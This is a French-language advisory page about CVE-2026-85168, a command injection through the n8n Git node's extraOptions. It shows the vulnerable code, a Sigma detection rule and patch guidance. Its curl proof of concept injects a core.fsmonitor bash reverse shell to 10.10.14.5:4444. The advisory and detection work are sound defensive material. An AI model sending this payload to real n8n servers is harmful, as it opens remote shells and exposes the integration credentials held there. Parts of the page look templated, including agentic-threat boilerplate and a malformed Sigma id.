Aller au contenu

CVE-2026-85168 : injection de commandes OS via le nœud git dans N8N

HERMES

SCORE DE MENACE HERMES & ÉVALUATION D'INFRASTRUCTURE AGENTIQUE

Cible : n8n Automation Platform (n8n-nodes-base.git (Git Node))
Confiance : 98%
89 / 100
ÉLEVÉ

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 19 / 20
Activité de menace 18 / 20
Militarisation 18 / 20
Exposition 18 / 20
Prévalence 17 / 20
Impact 17 / 20
Maturité de l'exploit 18 / 20
Potentiel d'attaque en chaîne 18 / 20
⚖️ Divergence & Justification opérationnelle

Le score CVSS v3.1 s'élève à 8.8 (Élevé) tandis que le score Hermes Threat Score est calculé à 89 (ÉLEVÉ). Étant donné que les nœuds n8n manipulent souvent des clés API de production et des accès cloud critiques, l'exécution de code au sein du conteneur n8n expose immédiatement l'ensemble des intégrations tierces.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-85168: Git Node Merge-Driver & Content-Filter Command Injection in n8nVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTn8n Workflow Automation
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in n8n Workflow Automation documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification TechniqueContexte de Menace
Identifiant CVECVE-2026-85168Menaces IA Agentique & Protocole MCP
Produit ciblén8n Automation Platformn8n GmbH
Composant affectén8n-nodes-base.git (Git Node)Orchestrateur et couche d’outils agentiques
Nature de la failleCWE-78: OS Command InjectionViolation d’intégrité et d’exécution
Versions vulnérablesprior to 1.123.73, 2.0.0 through 2.35.3, 2.36.0 through 2.36.1Environnements en production
Correctif disponible1.123.73, 2.35.4, 2.36.2Mise à jour impérative

Le nœud Git de n8n s’appuie sur la bibliothèque simple-git. Lors de l’évaluation des options complémentaires de clonage, la chaîne transmise était découpée de manière naïve sans vérification des clés de configuration Git :

// Code vulnérable dans packages/nodes-base/nodes/Git/Git.node.ts
const gitOptions: string[] = [];
if (this.getNodeParameter('extraOptions', i, '')) {
gitOptions.push(...(this.getNodeParameter('extraOptions', i) as string).split(' '));
}
await git.clone(repoUrl, targetPath, gitOptions);

En fournissant un paramètre extraOptions contenant -c core.fsmonitor="bash -c '...'" ou un pilote de fusion personnalisé, Git invoque immédiatement l’exécutable spécifié lors de l’opération sur l’arborescence de travail.

+----------------------------------------------------------------------------------------------------+
| CYCLE D'ATTAQUE CVE-2026-85168 |
+----------------------------------------------------------------------------------------------------+
[Attaquant / Injection de Prompt]
│
│ [1] Émission du payload ciblant l'interface d'outil ou l'orchestrateur
▼
[n8n Automation Platform]
│
├───► 1. Ingestion par n8n-nodes-base.git (Git Node)
│ - Échec de validation, absence de filtrage ou contournement de sandbox
│
├───► 2. Exécution / Mutation d'état
│ - Exécution de commandes OS ou exfiltration d'identifiants
│
▼
[Infrastructure Cible Compromise]
│
└───► Vol de données, prise de contrôle du serveur ou persistance
+----------------------------------------------------------------------------------------------------+

Fenêtre de terminal
# PoC : Déclenchement de l'injection de commandes via les options Git n8n
curl -X POST "https://n8n.internal.corp/webhook/git-sync" \
-H "Content-Type: application/json" \
-d '{
"repoUrl": "https://github.com/legit-org/docs.git",
"branch": "main",
"extraOptions": "-c core.fsmonitor=\"bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'\""
}'

title: n8n Git Node Arbitrary Command Execution
id: 85168c02-e168-4a1b-9f23-n8ngitcmd01
status: high
description: Detects command execution spawned by n8n worker processes invoking git with custom fsmonitor, merge-driver or filter configurations.
author: Hermes Codex Detection Engineering
date: 2026-09-05
logsource:
category: process_creation
product: linux
detection:
selection:
ParentImage|endswith:
- '/node'
- '/n8n'
Image|endswith: '/git'
CommandLine|contains:
- 'core.fsmonitor'
- 'filter.'
- 'merge.'
- '-c '
condition: selection
falsepositives:
- Legitimate automated developer tooling with specialized filter configurations.
level: critical

  1. Appliquer les correctifs : mettre à jour n8n Automation Platform vers la version 1.123.73, 2.35.4, 2.36.2 sans délai.
  2. Restreindre les outils MCP : vérifier les déclarations d’outils et isoler les exécutions dans des conteneurs sandboxés éphémères.
  3. Auditer les journaux système : examiner les logs d’exécution pour repérer d’éventuels processus enfants anormaux ou appels réseau suspects.
  4. Appliquer le moindre privilège : restreindre les comptes de service associés aux agents sur les bases de données et les clés cloud.